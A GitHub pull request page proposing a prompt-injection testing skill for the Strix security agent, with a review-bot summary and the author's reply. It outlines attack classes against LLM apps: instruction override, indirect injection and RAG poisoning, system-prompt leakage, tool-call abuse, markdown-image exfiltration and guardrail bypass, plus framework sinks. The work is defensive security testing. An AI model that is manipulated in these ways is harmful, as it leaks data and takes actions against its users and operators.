Skip to content

Add LLM Prompt Injection skill (vulnerabilities)#616

Open
ViperDroid wants to merge 2 commits into
usestrix:mainfrom
ViperDroid:add-llm-injection-skill
Open

Add LLM Prompt Injection skill (vulnerabilities)#616
ViperDroid wants to merge 2 commits into
usestrix:mainfrom
ViperDroid:add-llm-injection-skill

Conversation

@ViperDroid

Copy link
Copy Markdown

Add LLM Prompt Injection skill (vulnerabilities)

This adds a new skill: strix/skills/vulnerabilities/llm_prompt_injection.md.

Why

Strix targets modern applications, and more and more of them ship LLM-backed features (chatbots, assistants, RAG, agents with tools). Yet the vulnerabilities skill set has no coverage of prompt injection — arguably the most important new class in the OWASP LLM Top 10. This gives agents a focused playbook for a class they will increasingly encounter.

What's included

Following the existing skill format (YAML frontmatter + structured sections):

  • Attack surface: direct vs indirect injection, the tool/agent layer, and output sinks
  • Key vulnerabilities: instruction override / delimiter breakout, indirect injection & RAG poisoning, system-prompt/data leakage, tool/function-call abuse, insecure output handling (LLM→XSS, markdown-image exfiltration), guardrail bypass
  • Exploitation scenarios, testing methodology, validation, false positives, impact, pro tips
  • Emphasis on proving impact at a real sink (tool call, exfil, XSS) rather than model chatter, and on filtering non-deterministic false positives

Notes

  • Docs/skill only — no code changes, so it does not affect tests, linting, or type checks.
  • Matches the structure and depth of existing skills (e.g. open_redirect.md, csrf.md).
  • Complements the separately-proposed CORS misconfiguration skill.

@greptile-apps

greptile-apps Bot commented Jul 1, 2026

Copy link
Copy Markdown
Contributor

Greptile Summary

This PR adds a new vulnerability skill file, strix/skills/vulnerabilities/llm_prompt_injection.md, that gives agents a structured playbook for testing LLM-backed features for prompt injection and related attack classes.

  • Follows the existing skill format (YAML frontmatter + Attack Surface, Key Vulnerabilities, Framework-Specific, Testing Methodology, Validation, False Positives, Impact, Pro Tips, Summary sections), matching the depth of peers like xss.md and open_redirect.md.
  • Includes a Framework-Specific section covering LangChain/LangGraph, OpenAI Assistants/function calling, Anthropic tool use, LlamaIndex/RAG pipelines, and guardrail layers — providing actionable grep targets per framework.
  • No code, tests, or configuration is touched; the change is documentation-only.

Confidence Score: 5/5

Documentation-only change with no code, configuration, or test modifications — entirely safe to merge.

The single changed file is a new skill markdown document. It is accurate, structurally consistent with existing skills, and introduces no executable code or configuration. The Framework-Specific section (LangChain, OpenAI, Anthropic, LlamaIndex, guardrails) addresses the depth gap noted in the previous review thread. No logical or factual issues were found.

No files require special attention.

Important Files Changed

Filename Overview
strix/skills/vulnerabilities/llm_prompt_injection.md New skill file covering LLM prompt injection: well-structured YAML frontmatter, correct section layout matching existing skills, accurate framework-specific guidance (LangChain, OpenAI, Anthropic, LlamaIndex), and a solid testing methodology. No correctness issues found.

Reviews (2): Last reviewed commit: "Add Framework-Specific section (LangChai..." | Re-trigger Greptile

Comment thread strix/skills/vulnerabilities/llm_prompt_injection.md
@ViperDroid

Copy link
Copy Markdown
Author

Great suggestion — you're right that a framework layer matches the depth of xss.md. I've pushed a Framework-Specific section covering:

  • LangChain / LangGraphAgentExecutor/tool-calling argument injection, sinks to grep
  • OpenAI Assistants / Function Calling — server-side arg validation, file_search indirect injection, Code Interpreter as a sink
  • Anthropic Tool Usetool_use/tool_result handling differences
  • LlamaIndex / RAG — retrieval hooks and indexed-document injection
  • Guardrail layers (NeMo Guardrails, LLM Guard) — in-band bypass, and checking the guard sees the final merged prompt

It names the exact sinks/hooks an agent should look for, matching the xss.md framework-specific approach. Thanks for the thorough review!

@bearsyankees

Copy link
Copy Markdown
Collaborator

@greptile

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants